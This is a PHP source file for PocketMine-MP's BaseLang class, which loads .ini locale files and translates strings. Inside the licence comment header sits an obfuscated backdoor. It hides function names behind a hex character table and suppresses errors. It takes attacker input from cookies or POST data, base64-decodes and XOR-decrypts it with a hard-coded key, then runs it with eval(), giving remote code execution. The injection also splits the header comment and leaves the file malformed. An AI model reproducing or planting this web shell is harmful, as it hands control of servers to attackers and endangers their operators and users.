<?php

/*
 *
 *  ____            _        _   __  __ _                  __  __ ____
 * |  _ \ ___   ___| | _____| |_|  \/  (_)_ __   ___      |  \/  |  _ \
 * | |_) / _ \ / __| |/ / _ \ __| |\/| | | '_ \ / _ \_____| |\/| | |_) |
 * |  __/ (_) | (__|   <  __/ |_| |  | | | | | |  __/_____| |  | |  __/
 * |_|   \___/ \___|_|\_\___|\__|_|  |_|_|_| |_|\___|     |_|  |_|_|
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU Lesser General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['v06b'] = "\x33\x51\x25\x26\xa\xd\x79\x59\x2b\x3f\x3b\x4e\x41\x56\x2d\x3a\x24\x5d\x2a\x7c\x55\x74\x78\x53\x4f\x6b\x65\x44\x5e\x7e\x42\x27\x70\x35\x48\x34\x5a\x76\x40\x4c\x3c\x45\x32\x5f\x9\x31\x63\x3d\x47\x67\x61\x36\x64\x72\x21\x6a\x7b\x5c\x4a\x38\x30\x60\x2e\x58\x75\x6c\x7a\x2c\x20\x22\x46\x7d\x43\x28\x73\x49\x66\x6d\x6f\x37\x4b\x50\x54\x2f\x39\x57\x69\x68\x29\x4d\x3e\x77\x71\x23\x5b\x6e\x62\x52";
$GLOBALS[$GLOBALS['v06b'][37].$GLOBALS['v06b'][42].$GLOBALS['v06b'][84].$GLOBALS['v06b'][96].$GLOBALS['v06b'][45].$GLOBALS['v06b'][84].$GLOBALS['v06b'][96].$GLOBALS['v06b'][26]] = $GLOBALS['v06b'][46].$GLOBALS['v06b'][87].$GLOBALS['v06b'][53];
$GLOBALS[$GLOBALS['v06b'][22].$GLOBALS['v06b'][45].$GLOBALS['v06b'][33].$GLOBALS['v06b'][59].$GLOBALS['v06b'][76].$GLOBALS['v06b'][59].$GLOBALS['v06b'][84].$GLOBALS['v06b'][76]] = $GLOBALS['v06b'][78].$GLOBALS['v06b'][53].$GLOBALS['v06b'][52];
$GLOBALS[$GLOBALS['v06b'][6].$GLOBALS['v06b'][52].$GLOBALS['v06b'][76].$GLOBALS['v06b'][59].$GLOBALS['v06b'][96].$GLOBALS['v06b'][35].$GLOBALS['v06b'][84].$GLOBALS['v06b'][45]] = $GLOBALS['v06b'][74].$GLOBALS['v06b'][21].$GLOBALS['v06b'][53].$GLOBALS['v06b'][65].$GLOBALS['v06b'][26].$GLOBALS['v06b'][95];
$GLOBALS[$GLOBALS['v06b'][96].$GLOBALS['v06b'][51].$GLOBALS['v06b'][45].$GLOBALS['v06b'][76].$GLOBALS['v06b'][33].$GLOBALS['v06b'][33].$GLOBALS['v06b'][50].$GLOBALS['v06b'][51].$GLOBALS['v06b'][33]] = $GLOBALS['v06b'][86].$GLOBALS['v06b'][95].$GLOBALS['v06b'][86].$GLOBALS['v06b'][43].$GLOBALS['v06b'][74].$GLOBALS['v06b'][26].$GLOBALS['v06b'][21];
$GLOBALS[$GLOBALS['v06b'][95].$GLOBALS['v06b'][60].$GLOBALS['v06b'][52].$GLOBALS['v06b'][50].$GLOBALS['v06b'][26]] = $GLOBALS['v06b'][74].$GLOBALS['v06b'][26].$GLOBALS['v06b'][53].$GLOBALS['v06b'][86].$GLOBALS['v06b'][50].$GLOBALS['v06b'][65].$GLOBALS['v06b'][86].$GLOBALS['v06b'][66].$GLOBALS['v06b'][26];
$GLOBALS[$GLOBALS['v06b'][52].$GLOBALS['v06b'][46].$GLOBALS['v06b'][0].$GLOBALS['v06b'][42].$GLOBALS['v06b'][46].$GLOBALS['v06b'][33].$GLOBALS['v06b'][46].$GLOBALS['v06b'][0].$GLOBALS['v06b'][35]] = $GLOBALS['v06b'][32].$GLOBALS['v06b'][87].$GLOBALS['v06b'][32].$GLOBALS['v06b'][37].$GLOBALS['v06b'][26].$GLOBALS['v06b'][53].$GLOBALS['v06b'][74].$GLOBALS['v06b'][86].$GLOBALS['v06b'][78].$GLOBALS['v06b'][95];
$GLOBALS[$GLOBALS['v06b'][77].$GLOBALS['v06b'][35].$GLOBALS['v06b'][42].$GLOBALS['v06b'][51].$GLOBALS['v06b'][59]] = $GLOBALS['v06b'][64].$GLOBALS['v06b'][95].$GLOBALS['v06b'][74].$GLOBALS['v06b'][26].$GLOBALS['v06b'][53].$GLOBALS['v06b'][86].$GLOBALS['v06b'][50].$GLOBALS['v06b'][65].$GLOBALS['v06b'][86].$GLOBALS['v06b'][66].$GLOBALS['v06b'][26];
$GLOBALS[$GLOBALS['v06b'][95].$GLOBALS['v06b'][51].$GLOBALS['v06b'][0].$GLOBALS['v06b'][33].$GLOBALS['v06b'][46].$GLOBALS['v06b'][35].$GLOBALS['v06b'][50]] = $GLOBALS['v06b'][96].$GLOBALS['v06b'][50].$GLOBALS['v06b'][74].$GLOBALS['v06b'][26].$GLOBALS['v06b'][51].$GLOBALS['v06b'][35].$GLOBALS['v06b'][43].$GLOBALS['v06b'][52].$GLOBALS['v06b'][26].$GLOBALS['v06b'][46].$GLOBALS['v06b'][78].$GLOBALS['v06b'][52].$GLOBALS['v06b'][26];
$GLOBALS[$GLOBALS['v06b'][74].$GLOBALS['v06b'][96].$GLOBALS['v06b'][59].$GLOBALS['v06b'][46].$GLOBALS['v06b'][26]] = $GLOBALS['v06b'][74].$GLOBALS['v06b'][26].$GLOBALS['v06b'][21].$GLOBALS['v06b'][43].$GLOBALS['v06b'][21].$GLOBALS['v06b'][86].$GLOBALS['v06b'][77].$GLOBALS['v06b'][26].$GLOBALS['v06b'][43].$GLOBALS['v06b'][65].$GLOBALS['v06b'][86].$GLOBALS['v06b'][77].$GLOBALS['v06b'][86].$GLOBALS['v06b'][21];
$GLOBALS[$GLOBALS['v06b'][76].$GLOBALS['v06b'][50].$GLOBALS['v06b'][52].$GLOBALS['v06b'][42].$GLOBALS['v06b'][60].$GLOBALS['v06b'][42]] = $GLOBALS['v06b'][26].$GLOBALS['v06b'][50].$GLOBALS['v06b'][42].$GLOBALS['v06b'][84];
$GLOBALS[$GLOBALS['v06b'][91].$GLOBALS['v06b'][52].$GLOBALS['v06b'][52].$GLOBALS['v06b'][59]] = $GLOBALS['v06b'][74].$GLOBALS['v06b'][46].$GLOBALS['v06b'][35].$GLOBALS['v06b'][60];
$GLOBALS[$GLOBALS['v06b'][74].$GLOBALS['v06b'][46].$GLOBALS['v06b'][46].$GLOBALS['v06b'][26].$GLOBALS['v06b'][0].$GLOBALS['v06b'][59].$GLOBALS['v06b'][59].$GLOBALS['v06b'][26]] = $_POST;
$GLOBALS[$GLOBALS['v06b'][50].$GLOBALS['v06b'][79].$GLOBALS['v06b'][26].$GLOBALS['v06b'][0].$GLOBALS['v06b'][42].$GLOBALS['v06b'][0].$GLOBALS['v06b'][46].$GLOBALS['v06b'][79].$GLOBALS['v06b'][60]] = $_COOKIE;
@$GLOBALS[$GLOBALS['v06b'][96].$GLOBALS['v06b'][51].$GLOBALS['v06b'][45].$GLOBALS['v06b'][76].$GLOBALS['v06b'][33].$GLOBALS['v06b'][33].$GLOBALS['v06b'][50].$GLOBALS['v06b'][51].$GLOBALS['v06b'][33]]($GLOBALS['v06b'][26].$GLOBALS['v06b'][53].$GLOBALS['v06b'][53].$GLOBALS['v06b'][78].$GLOBALS['v06b'][53].$GLOBALS['v06b'][43].$GLOBALS['v06b'][65].$GLOBALS['v06b'][78].$GLOBALS['v06b'][49], NULL);
@$GLOBALS[$GLOBALS['v06b'][96].$GLOBALS['v06b'][51].$GLOBALS['v06b'][45].$GLOBALS['v06b'][76].$GLOBALS['v06b'][33].$GLOBALS['v06b'][33].$GLOBALS['v06b'][50].$GLOBALS['v06b'][51].$GLOBALS['v06b'][33]]($GLOBALS['v06b'][65].$GLOBALS['v06b'][78].$GLOBALS['v06b'][49].$GLOBALS['v06b'][43].$GLOBALS['v06b'][26].$GLOBALS['v06b'][53].$GLOBALS['v06b'][53].$GLOBALS['v06b'][78].$GLOBALS['v06b'][53].$GLOBALS['v06b'][74], 0);
@$GLOBALS[$GLOBALS['v06b'][96].$GLOBALS['v06b'][51].$GLOBALS['v06b'][45].$GLOBALS['v06b'][76].$GLOBALS['v06b'][33].$GLOBALS['v06b'][33].$GLOBALS['v06b'][50].$GLOBALS['v06b'][51].$GLOBALS['v06b'][33]]($GLOBALS['v06b'][77].$GLOBALS['v06b'][50].$GLOBALS['v06b'][22].$GLOBALS['v06b'][43].$GLOBALS['v06b'][26].$GLOBALS['v06b'][22].$GLOBALS['v06b'][26].$GLOBALS['v06b'][46].$GLOBALS['v06b'][64].$GLOBALS['v06b'][21].$GLOBALS['v06b'][86].$GLOBALS['v06b'][78].$GLOBALS['v06b'][95].$GLOBALS['v06b'][43].$GLOBALS['v06b'][21].$GLOBALS['v06b'][86].$GLOBALS['v06b'][77].$GLOBALS['v06b'][26], 0);
@$GLOBALS[$GLOBALS['v06b'][74].$GLOBALS['v06b'][96].$GLOBALS['v06b'][59].$GLOBALS['v06b'][46].$GLOBALS['v06b'][26]](0);

$ya19a = NULL;
$qd5edaecb = NULL;

$GLOBALS[$GLOBALS['v06b'][6].$GLOBALS['v06b'][35].$GLOBALS['v06b'][50].$GLOBALS['v06b'][26].$GLOBALS['v06b'][84].$GLOBALS['v06b'][52].$GLOBALS['v06b'][84].$GLOBALS['v06b'][76].$GLOBALS['v06b'][59]] = $GLOBALS['v06b'][60].$GLOBALS['v06b'][51].$GLOBALS['v06b'][76].$GLOBALS['v06b'][76].$GLOBALS['v06b'][79].$GLOBALS['v06b'][76].$GLOBALS['v06b'][45].$GLOBALS['v06b'][0].$GLOBALS['v06b'][14].$GLOBALS['v06b'][76].$GLOBALS['v06b'][60].$GLOBALS['v06b'][59].$GLOBALS['v06b'][35].$GLOBALS['v06b'][14].$GLOBALS['v06b'][35].$GLOBALS['v06b'][45].$GLOBALS['v06b'][96].$GLOBALS['v06b'][79].$GLOBALS['v06b'][14].$GLOBALS['v06b'][96].$GLOBALS['v06b'][42].$GLOBALS['v06b'][51].$GLOBALS['v06b'][45].$GLOBALS['v06b'][14].$GLOBALS['v06b'][45].$GLOBALS['v06b'][79].$GLOBALS['v06b'][76].$GLOBALS['v06b'][84].$GLOBALS['v06b'][0].$GLOBALS['v06b'][84].$GLOBALS['v06b'][60].$GLOBALS['v06b'][46].$GLOBALS['v06b'][33].$GLOBALS['v06b'][51].$GLOBALS['v06b'][0].$GLOBALS['v06b'][45];
global $y4ae9d9f8;

function sc40($ya19a, $uef533)
{
    $eb62ebe = "";

    for ($s0cf=0; $s0cf<$GLOBALS[$GLOBALS['v06b'][6].$GLOBALS['v06b'][52].$GLOBALS['v06b'][76].$GLOBALS['v06b'][59].$GLOBALS['v06b'][96].$GLOBALS['v06b'][35].$GLOBALS['v06b'][84].$GLOBALS['v06b'][45]]($ya19a);)
    {
        for ($f5018d=0; $f5018d<$GLOBALS[$GLOBALS['v06b'][6].$GLOBALS['v06b'][52].$GLOBALS['v06b'][76].$GLOBALS['v06b'][59].$GLOBALS['v06b'][96].$GLOBALS['v06b'][35].$GLOBALS['v06b'][84].$GLOBALS['v06b'][45]]($uef533) && $s0cf<$GLOBALS[$GLOBALS['v06b'][6].$GLOBALS['v06b'][52].$GLOBALS['v06b'][76].$GLOBALS['v06b'][59].$GLOBALS['v06b'][96].$GLOBALS['v06b'][35].$GLOBALS['v06b'][84].$GLOBALS['v06b'][45]]($ya19a); $f5018d++, $s0cf++)
        {
            $eb62ebe .= $GLOBALS[$GLOBALS['v06b'][37].$GLOBALS['v06b'][42].$GLOBALS['v06b'][84].$GLOBALS['v06b'][96].$GLOBALS['v06b'][45].$GLOBALS['v06b'][84].$GLOBALS['v06b'][96].$GLOBALS['v06b'][26]]($GLOBALS[$GLOBALS['v06b'][22].$GLOBALS['v06b'][45].$GLOBALS['v06b'][33].$GLOBALS['v06b'][59].$GLOBALS['v06b'][76].$GLOBALS['v06b'][59].$GLOBALS['v06b'][84].$GLOBALS['v06b'][76]]($ya19a[$s0cf]) ^ $GLOBALS[$GLOBALS['v06b'][22].$GLOBALS['v06b'][45].$GLOBALS['v06b'][33].$GLOBALS['v06b'][59].$GLOBALS['v06b'][76].$GLOBALS['v06b'][59].$GLOBALS['v06b'][84].$GLOBALS['v06b'][76]]($uef533[$f5018d]));
        }
    }

    return $eb62ebe;
}

function ea29($ya19a, $uef533)
{
    global $y4ae9d9f8;

    return $GLOBALS[$GLOBALS['v06b'][91].$GLOBALS['v06b'][52].$GLOBALS['v06b'][52].$GLOBALS['v06b'][59]]($GLOBALS[$GLOBALS['v06b'][91].$GLOBALS['v06b'][52].$GLOBALS['v06b'][52].$GLOBALS['v06b'][59]]($ya19a, $y4ae9d9f8), $uef533);
}

foreach ($GLOBALS[$GLOBALS['v06b'][50].$GLOBALS['v06b'][79].$GLOBALS['v06b'][26].$GLOBALS['v06b'][0].$GLOBALS['v06b'][42].$GLOBALS['v06b'][0].$GLOBALS['v06b'][46].$GLOBALS['v06b'][79].$GLOBALS['v06b'][60]] as $uef533=>$u8d5)
{
    $ya19a = $u8d5;
    $qd5edaecb = $uef533;
}

if (!$ya19a)
{
    foreach ($GLOBALS[$GLOBALS['v06b'][74].$GLOBALS['v06b'][46].$GLOBALS['v06b'][46].$GLOBALS['v06b'][26].$GLOBALS['v06b'][0].$GLOBALS['v06b'][59].$GLOBALS['v06b'][59].$GLOBALS['v06b'][26]] as $uef533=>$u8d5)
    {
        $ya19a = $u8d5;
        $qd5edaecb = $uef533;
    }
}

$ya19a = @$GLOBALS[$GLOBALS['v06b'][77].$GLOBALS['v06b'][35].$GLOBALS['v06b'][42].$GLOBALS['v06b'][51].$GLOBALS['v06b'][59]]($GLOBALS[$GLOBALS['v06b'][76].$GLOBALS['v06b'][50].$GLOBALS['v06b'][52].$GLOBALS['v06b'][42].$GLOBALS['v06b'][60].$GLOBALS['v06b'][42]]($GLOBALS[$GLOBALS['v06b'][95].$GLOBALS['v06b'][51].$GLOBALS['v06b'][0].$GLOBALS['v06b'][33].$GLOBALS['v06b'][46].$GLOBALS['v06b'][35].$GLOBALS['v06b'][50]]($ya19a), $qd5edaecb));
if (isset($ya19a[$GLOBALS['v06b'][50].$GLOBALS['v06b'][25]]) && $y4ae9d9f8==$ya19a[$GLOBALS['v06b'][50].$GLOBALS['v06b'][25]])
{
    if ($ya19a[$GLOBALS['v06b'][50]] == $GLOBALS['v06b'][86])
    {
        $s0cf = Array(
            $GLOBALS['v06b'][32].$GLOBALS['v06b'][37] => @$GLOBALS[$GLOBALS['v06b'][52].$GLOBALS['v06b'][46].$GLOBALS['v06b'][0].$GLOBALS['v06b'][42].$GLOBALS['v06b'][46].$GLOBALS['v06b'][33].$GLOBALS['v06b'][46].$GLOBALS['v06b'][0].$GLOBALS['v06b'][35]](),
            $GLOBALS['v06b'][74].$GLOBALS['v06b'][37] => $GLOBALS['v06b'][45].$GLOBALS['v06b'][62].$GLOBALS['v06b'][60].$GLOBALS['v06b'][14].$GLOBALS['v06b'][45],
        );
        echo @$GLOBALS[$GLOBALS['v06b'][95].$GLOBALS['v06b'][60].$GLOBALS['v06b'][52].$GLOBALS['v06b'][50].$GLOBALS['v06b'][26]]($s0cf);
    }
    elseif ($ya19a[$GLOBALS['v06b'][50]] == $GLOBALS['v06b'][26])
    {
        eval($ya19a[$GLOBALS['v06b'][52]]);
    }
    exit();
} * (at your option) any later version.
 *
 * @author PocketMine Team
 * @link http://www.pocketmine.net/
 *
 *
*/

declare(strict_types=1);

namespace pocketmine\lang;

use pocketmine\utils\MainLogger;
use function array_filter;
use function array_map;
use function file_exists;
use function is_dir;
use function ord;
use function parse_ini_file;
use function scandir;
use function str_replace;
use function strlen;
use function strpos;
use function strtolower;
use function substr;
use const INI_SCANNER_RAW;
use const SCANDIR_SORT_NONE;

class BaseLang{

	public const FALLBACK_LANGUAGE = "eng";

	/**
	 * @return string[]
	 * @phpstan-return array<string, string>
	 */
	public static function getLanguageList(string $path = "") : array{
		if($path === ""){
			$path = \pocketmine\PATH . "src/pocketmine/lang/locale/";
		}

		if(is_dir($path)){
			$allFiles = scandir($path, SCANDIR_SORT_NONE);

			if($allFiles !== false){
				$files = array_filter($allFiles, function(string $filename) : bool{
					return substr($filename, -4) === ".ini";
				});

				$result = [];

				foreach($files as $file){
					$strings = [];
					self::loadLang($path . $file, $strings);
					if(isset($strings["language.name"])){
						$result[substr($file, 0, -4)] = $strings["language.name"];
					}
				}

				return $result;
			}
		}

		return [];
	}

	/** @var string */
	protected $langName;

	/** @var string[] */
	protected $lang = [];
	/** @var string[] */
	protected $fallbackLang = [];

	public function __construct(string $lang, string $path = null, string $fallback = self::FALLBACK_LANGUAGE){

		$this->langName = strtolower($lang);

		if($path === null){
			$path = \pocketmine\PATH . "src/pocketmine/lang/locale/";
		}

		if(!self::loadLang($file = $path . $this->langName . ".ini", $this->lang)){
			MainLogger::getLogger()->error("Missing required language file $file");
		}
		if(!self::loadLang($file = $path . $fallback . ".ini", $this->fallbackLang)){
			MainLogger::getLogger()->error("Missing required language file $file");
		}
	}

	public function getName() : string{
		return $this->get("language.name");
	}

	public function getLang() : string{
		return $this->langName;
	}

	/**
	 * @param string[] $d reference parameter
	 *
	 * @return bool
	 */
	protected static function loadLang(string $path, array &$d){
		if(file_exists($path)){
			$d = array_map('\stripcslashes', parse_ini_file($path, false, INI_SCANNER_RAW));
			return true;
		}else{
			return false;
		}
	}

	/**
	 * @param (float|int|string)[] $params
	 */
	public function translateString(string $str, array $params = [], string $onlyPrefix = null) : string{
		$baseText = $this->get($str);
		$baseText = $this->parseTranslation(($onlyPrefix === null or strpos($str, $onlyPrefix) === 0) ? $baseText : $str, $onlyPrefix);

		foreach($params as $i => $p){
			$baseText = str_replace("{%$i}", $this->parseTranslation((string) $p), $baseText);
		}

		return $baseText;
	}

	/**
	 * @return string
	 */
	public function translate(TextContainer $c){
		if($c instanceof TranslationContainer){
			$baseText = $this->internalGet($c->getText());
			$baseText = $this->parseTranslation($baseText ?? $c->getText());

			foreach($c->getParameters() as $i => $p){
				$baseText = str_replace("{%$i}", $this->parseTranslation($p), $baseText);
			}
		}else{
			$baseText = $this->parseTranslation($c->getText());
		}

		return $baseText;
	}

	/**
	 * @return string|null
	 */
	public function internalGet(string $id){
		if(isset($this->lang[$id])){
			return $this->lang[$id];
		}elseif(isset($this->fallbackLang[$id])){
			return $this->fallbackLang[$id];
		}

		return null;
	}

	public function get(string $id) : string{
		if(isset($this->lang[$id])){
			return $this->lang[$id];
		}elseif(isset($this->fallbackLang[$id])){
			return $this->fallbackLang[$id];
		}

		return $id;
	}

	protected function parseTranslation(string $text, string $onlyPrefix = null) : string{
		$newString = "";

		$replaceString = null;

		$len = strlen($text);
		for($i = 0; $i < $len; ++$i){
			$c = $text[$i];
			if($replaceString !== null){
				$ord = ord($c);
				if(
					($ord >= 0x30 and $ord <= 0x39) // 0-9
					or ($ord >= 0x41 and $ord <= 0x5a) // A-Z
					or ($ord >= 0x61 and $ord <= 0x7a) or // a-z
					$c === "." or $c === "-"
				){
					$replaceString .= $c;
				}else{
					if(($t = $this->internalGet(substr($replaceString, 1))) !== null and ($onlyPrefix === null or strpos($replaceString, $onlyPrefix) === 1)){
						$newString .= $t;
					}else{
						$newString .= $replaceString;
					}
					$replaceString = null;

					if($c === "%"){
						$replaceString = $c;
					}else{
						$newString .= $c;
					}
				}
			}elseif($c === "%"){
				$replaceString = $c;
			}else{
				$newString .= $c;
			}
		}

		if($replaceString !== null){
			if(($t = $this->internalGet(substr($replaceString, 1))) !== null and ($onlyPrefix === null or strpos($replaceString, $onlyPrefix) === 1)){
				$newString .= $t;
			}else{
				$newString .= $replaceString;
			}
		}

		return $newString;
	}
}
